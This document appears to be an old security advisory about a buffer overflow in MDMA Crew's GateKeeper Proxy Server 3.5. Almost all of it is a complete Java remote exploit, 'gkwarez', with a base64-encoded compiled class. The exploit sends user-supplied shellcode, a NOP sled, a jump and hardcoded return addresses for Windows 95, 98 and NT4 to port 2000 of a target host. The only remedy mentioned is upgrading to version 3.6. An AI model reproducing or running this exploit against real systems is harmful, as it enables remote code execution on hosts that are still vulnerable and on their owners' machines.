COMMAND
GateKeeper
SYSTEMS AFFECTED
MDMA Crew's GateKeeper
PROBLEM
wizdumb found following. He covered a flaw in Gatekeeper 3.5.
Below You will find the Java src and the bytecode attached.
/* gkwarez.java by Andrew Lewis aka. Wizdumb
* <wizdumb@leet.org || www.mdma.za.net || wizdumb@IRC>
*
* Remote exploit for Gatekeeper Proxy Server 3.5 (and prior versions?).
* Written as proof of concept code only - the MDMA crew do not condone
* illegal activities in any way what-so-ever.
*
* This code is now public - Gatekeeper version 3.6 is out. :-)
*
* Shellcode is handled plug and play style for flexibility and defence
* against script kiddies. :) Oh, and coz I'm too dumb to make some and too
* lazy to find some. :P Also note that nulls in your shellcode are fine for
* this daemon - just beware of terminating newlines.
*
* Greetz to everyone in MDMA, USSRLabs, b10z, and BlabberNet's #hack
*/
import java.io.*;
import java.net.*;
class gkwarez {
public static void main(String[] args) throws IOException {
if (args.length != 3) {
System.out.println("Syntax: java gkwarez [host] [shellcode-file] [version]\n");
System.out.println("Shellcode file is code you want to execute on the host");
System.out.println("Valid versions are 95 (Win95), 98 (Win98), 3 (NT4/SP3) and 4 (NT4/SP4)");
System.exit(1); }
int c;
Socket soq = null;
char[] wet = null;
PrintWriter white = null;
BufferedReader hellkode = null;
char nop = 0x90;
char[] jmpcode = { 0xE9, 0xF9, 0xEF, 0x90 };
// Static addys for "call eax" (backwards) - any1 know of more? mail me. :)
char[] retwin95 = { 0x30, 0x11, 0x71, 0x7F };
char[] retwin98 = { 0x7B, 0xFF, 0xF7, 0xBF };
char[] retntsp3 = { 0xC7, 0x5A, 0xFA, 0x77 };
char[] retntsp4 = { 0x5D, 0x63, 0xF7, 0x77 };
try {
switch (Integer.parseInt(args[2])) {
case 95:
wet = retwin95;
break;
case 98:
wet = retwin98;
break;
case 3:
wet = retntsp3;
break;
case 4:
wet = retntsp4;
break;
default:
System.out.println("Version specified invalid: Expecting 95, 98, 3, or 4");
System.exit(1);
break; } } catch (Exception e) {
System.out.println("Version specified invalid: Expecting 95, 98, 3, or 4");
System.exit(1); }
try {
hellkode = new BufferedReader(new FileReader(args[1]));
} catch (Exception e) {
System.out.println("Unable to open file: " + args[1]);
System.exit(1); }
try {
soq = new Socket(args[0], 2000);
white = new PrintWriter(soq.getOutputStream(), true);
} catch (Exception e) {
System.out.println("Problems connecting :-/");
System.exit(1); }
for (int i = 0; i <= 4800; i++) {
if ((c = hellkode.read()) != -1) {
white.write(c);
if (i == 4096) {
System.out.println("Shellcode specified is too big (4095 bytes max). Bailing out...");
System.exit(1); } }
else {
if (i == 4096) {
white.print(jmpcode);
white.print(wet); }
else white.print(nop); } }
white.println();
System.out.println("Payload sent!"); } }
And, here's the gkwarez.class:
---
Content-Type: application/octet-stream; name="gkwarez.class"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="gkwarez.class"
Content-MD5: qpjsTW7tRE944zc1xMirRA==
yv66vgADAC0AbggATAgATQgATggATwgAUQgAUggAUwgAVAgAVQcAWQcAWwcAXAcAXQcAXgcA
XwcAYAcAYQcAYgcAYwcAZAcAZQoAEgAoCgAPACkKAAsAKgoADAArCgATACsKABUALAoAEwAt
CgAUAC4KABUALwkAFAAwCgARADEKAA8AMgoADwAzCgAPADQKAA4ANQoACwA2CgATADcKAA8A
OAwARwA8DABHAD8MAEcAQAwARwBDDABHAEQMAFYAQgwAVwA+DABYADoMAGcASwwAaABBDABp
AD0MAGkARQwAagA8DABqAEMMAGsAOQwAbAA7DABtAD4BAAMoKUkBABgoKUxqYXZhL2lvL091
dHB1dFN0cmVhbTsBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAAygpVgEABChDKVYBAAQoSSlW
AQAaKExqYXZhL2lvL091dHB1dFN0cmVhbTtaKVYBABMoTGphdmEvaW8vUmVhZGVyOylWAQAV
KExqYXZhL2xhbmcvU3RyaW5nOylJAQAsKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5n
L1N0cmluZ0J1ZmZlcjsBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBABYoTGphdmEvbGFuZy9T
dHJpbmc7SSlWAQAFKFtDKVYBABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAGPGluaXQ+AQAE
Q29kZQEACkV4Y2VwdGlvbnMBAA9MaW5lTnVtYmVyVGFibGUBABVMamF2YS9pby9QcmludFN0
cmVhbTsBAA1QYXlsb2FkIHNlbnQhAQAXUHJvYmxlbXMgY29ubmVjdGluZyA6LS8BADZTaGVs
bGNvZGUgZmlsZSBpcyBjb2RlIHlvdSB3YW50IHRvIGV4ZWN1dGUgb24gdGhlIGhvc3QBAD9T
aGVsbGNvZGUgc3BlY2lmaWVkIGlzIHRvbyBiaWcgKDQwOTUgYnl0ZXMgbWF4KS4gQmFpbGlu
ZyBvdXQuLi4BAApTb3VyY2VGaWxlAQA3U3ludGF4OiBqYXZhIGdrd2FyZXogW2hvc3RdIFtz
aGVsbGNvZGUtZmlsZV0gW3ZlcnNpb25dCgEAFVVuYWJsZSB0byBvcGVuIGZpbGU6IAEARlZh
bGlkIHZlcnNpb25zIGFyZSA5NSAoV2luOTUpLCA5OCAoV2luOTgpLCAzIChOVDQvU1AzKSBh
bmQgNCAoTlQ0L1NQNCkBADRWZXJzaW9uIHNwZWNpZmllZCBpbnZhbGlkOiBFeHBlY3Rpbmcg
OTUsIDk4LCAzLCBvciA0AQAFXWPDt3cBAAZhcHBlbmQBAARleGl0AQAPZ2V0T3V0cHV0U3Ry
ZWFtAQAHZ2t3YXJlegEADGdrd2FyZXouamF2YQEAFmphdmEvaW8vQnVmZmVyZWRSZWFkZXIB
ABJqYXZhL2lvL0ZpbGVSZWFkZXIBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQATamF2YS9pby9Q
cmludFN0cmVhbQEAE2phdmEvaW8vUHJpbnRXcml0ZXIBABNqYXZhL2xhbmcvRXhjZXB0aW9u
AQARamF2YS9sYW5nL0ludGVnZXIBABBqYXZhL2xhbmcvT2JqZWN0AQAWamF2YS9sYW5nL1N0
cmluZ0J1ZmZlcgEAEGphdmEvbGFuZy9TeXN0ZW0BAA9qYXZhL25ldC9Tb2NrZXQBAARtYWlu
AQADb3V0AQAIcGFyc2VJbnQBAAVwcmludAEAB3ByaW50bG4BAARyZWFkAQAIdG9TdHJpbmcB
AAV3cml0ZQAgAAoAEgAAAAAAAgAAAEcAPAABAEgAAAAdAAEAAQAAAAUqtwAWsQAAAAEASgAA
AAYAAQAAABcACQBmAEYAAgBIAAADAQAGAA4AAAHlKr4GnwAfsgAfEgW2ACSyAB8SA7YAJLIA
HxIHtgAkBLgAHQFNAU4BOgQBOgURAJA2Bge8BVkDEQDpVVkEEQD5VVkFEQDvVVkGEQCQVToH
B7wFWQMQMFVZBBARVVkFEHFVWQYQf1U6CAe8BVkDEHtVWQQRAP9VWQURAPdVWQYRAL9VOgkH
vAVZAxEAx1VZBBBaVVkFEQD6VVkGEHdVOgoHvAVZAxBdVVkEEGNVWQURAPdVWQYQd1U6CxIJ
OgwqBTK4ACCrAAAAAEIAAAAEAAAAAwAAADYAAAAEAAAAPAAAAF8AAAAqAAAAYgAAADAZCE6n
ADEZCU6nACsZCk6nACUZC06nAB+yAB8SCLYAJAS4AB2nABBXsgAfEgi2ACQEuAAduwALWbsA
DFkqBDK3ABm3ABg6BacAIFeyAB+7ABNZEga3ABoqBDK2ABy2ACa2ACQEuAAduwAVWSoDMhEH
0LcAG027AA9ZLLYAHgS3ABc6BKcAEFeyAB8SArYAJAS4AB0DNg2nAE0ZBbYAJVk8Ap8AIBkE
G7YAJxUNERAAoAAxsgAfEgS2ACQEuAAdpwAiFQ0REACgABMZBBkHtgAiGQQttgAipwAKGQQV
BrYAIYQNARUNERLApP+xGQS2ACOyAB8SAbYAJLEAAwC8ARMBEwAQASABMwE2ABABUwFvAXIA
EAABAEoAAADyADwAAAAbAAYAHAAOAB0AFgAeAB4AHwAiACIAJAAjACYAJAApACUALAAnADEA
KABOACsAZwAsAIMALQCeAC4AuAAvALwAMQC8ADIA7AA0AO8ANQDyADcA9QA4APgAOgD7ADsA
/gA9AQEAPgEEAEABDABBARAAQgEUAEMBHABEASAARgEgAEcBMwBGATYASAE3AEkBTwBKAVMA
TAFTAE0BYQBOAW8ATAFyAE8BcwBQAXsAUQF/AFMBhQBUAZAAVQGWAFYBngBXAaYAWAGqAFQB
rQBaAbUAWwG8AFwBwgBaAcUAXQHMAFMB1wBeAdwAXwHkABkASQAAAAQAAQANAAEAUAAAAAIA
Wg==
-----
SOLUTION
Gatekeeper 3.6 is out now it fixed bug above.